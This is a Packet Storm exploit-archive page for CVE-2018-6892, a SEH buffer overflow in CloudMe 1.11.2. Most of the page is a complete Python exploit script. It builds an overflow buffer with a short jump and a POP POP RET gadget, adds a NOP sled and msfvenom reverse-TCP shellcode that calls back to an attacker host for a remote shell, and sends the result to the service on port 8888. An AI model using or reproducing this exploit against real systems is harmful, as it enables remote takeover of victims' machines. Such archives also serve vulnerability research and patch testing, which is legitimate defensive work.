exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CloudMe 1.11.2 SEH Buffer Overflow

CloudMe 1.11.2 SEH Buffer Overflow
Posted Aug 3, 2020
Authored by Clement Cruchet

CloudMe version 1.11.2 SEH buffer overflow exploit.

tags | exploit, overflow
advisories | CVE-2018-6892
SHA-256 | dd926be7b4fc7bcef00625aa9853f7d8daaf02f5fd5828b55aa7fe3e2fd4c552

CloudMe 1.11.2 SEH Buffer Overflow

Change Mirror Download
import socket
import sys

target = "127.0.0.1"

#Written by : lutzenfried (Clement Cruchet)
#Exploiting CloudMe 1.11.2 (Publisher : CloudMe AB)
#Windows x64 10.0.18362 Build 18362
#Buffer Overflow using SEH overwritten technic (POP POP RET)
#Exploit for CVE-2018-6892

#Technical information used for exploit development
#Register EIP is overwritten with pattern at position 1052 in thread 1676
#SEH register is overwritten with pattern at position 2344 in thread 1676
#Bad characters : \x00\x0A\x0D
#0x61f2ba2e | pop edi, pop ebp, ret | False | False | False | False | False | C:\Users\user1\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll

buf = "\x41" * 2344
seh = "\xEB\x08\x90\x90" #Replace to short JMP
nseh = "\x2e\xba\xf2\x61" #Replace to POP POP RET
nopsled = b"\x90"*20 #NOP sled to go into payload

#msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.0.112 LPORT=4545 -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xda\xdb\xbf\x52\xf0\xea\x4a\xd9\x74\x24\xf4\x58\x33"
payload += b"\xc9\xb1\x56\x83\xe8\xfc\x31\x78\x14\x03\x78\x46\x12"
payload += b"\x1f\xb6\x8e\x50\xe0\x47\x4e\x35\x68\xa2\x7f\x75\x0e"
payload += b"\xa6\x2f\x45\x44\xea\xc3\x2e\x08\x1f\x50\x42\x85\x10"
payload += b"\xd1\xe9\xf3\x1f\xe2\x42\xc7\x3e\x60\x99\x14\xe1\x59"
payload += b"\x52\x69\xe0\x9e\x8f\x80\xb0\x77\xdb\x37\x25\xfc\x91"
payload += b"\x8b\xce\x4e\x37\x8c\x33\x06\x36\xbd\xe5\x1d\x61\x1d"
payload += b"\x07\xf2\x19\x14\x1f\x17\x27\xee\x94\xe3\xd3\xf1\x7c"
payload += b"\x3a\x1b\x5d\x41\xf3\xee\x9f\x85\x33\x11\xea\xff\x40"
payload += b"\xac\xed\x3b\x3b\x6a\x7b\xd8\x9b\xf9\xdb\x04\x1a\x2d"
payload += b"\xbd\xcf\x10\x9a\xc9\x88\x34\x1d\x1d\xa3\x40\x96\xa0"
payload += b"\x64\xc1\xec\x86\xa0\x8a\xb7\xa7\xf1\x76\x19\xd7\xe2"
payload += b"\xd9\xc6\x7d\x68\xf7\x13\x0c\x33\x9f\xd0\x3d\xcc\x5f"
payload += b"\x7f\x35\xbf\x6d\x20\xed\x57\xdd\xa9\x2b\xaf\x54\xbd"
payload += b"\xcb\x7f\xde\xae\x35\x80\x1e\xe6\xf1\xd4\x4e\x90\xd0"
payload += b"\x54\x05\x60\xdc\x80\xb3\x6a\x4a\x21\x49\x65\xbf\x5d"
payload += b"\x4f\x79\xae\x5c\xc6\x9f\x80\x0e\x88\x0f\x61\xff\x68"
payload += b"\xe0\x09\x15\x67\xdf\x2a\x16\xa2\x48\xc0\xf9\x1a\x20"
payload += b"\x7d\x63\x07\xba\x1c\x6c\x92\xc6\x1f\xe6\x16\x36\xd1"
payload += b"\x0f\x53\x24\x06\x68\x9b\xb4\xd7\x1d\x9b\xde\xd3\xb7"
payload += b"\xcc\x76\xde\xee\x3a\xd9\x21\xc5\x39\x1e\xdd\x98\x0b"
payload += b"\x54\xe8\x0e\x33\x02\x15\xdf\xb3\xd2\x43\xb5\xb3\xba"
payload += b"\x33\xed\xe0\xdf\x3b\x38\x95\x73\xae\xc3\xcf\x20\x79"
payload += b"\xac\xed\x1f\x4d\x73\x0e\x4a\xcd\x74\xf0\x08\xfa\xdc"
payload += b"\x98\xf2\xba\xdc\x58\x99\x3a\x8d\x30\x56\x14\x22\xf0"
payload += b"\x97\xbf\x6b\x98\x12\x2e\xd9\x39\x22\x7b\xbf\xe7\x23"
payload += b"\x88\x64\x18\x59\xe1\x9b\xd9\x9e\xeb\xff\xda\x9e\x13"
payload += b"\xfe\xe7\x48\x2a\x74\x26\x49\x09\x87\x1d\xec\x38\x02"
payload += b"\x5d\xa2\x3b\x07"


run = buf + seh + nseh + nopsled + payload

try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(run)

except Exception as e:
print(sys.exc_value)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close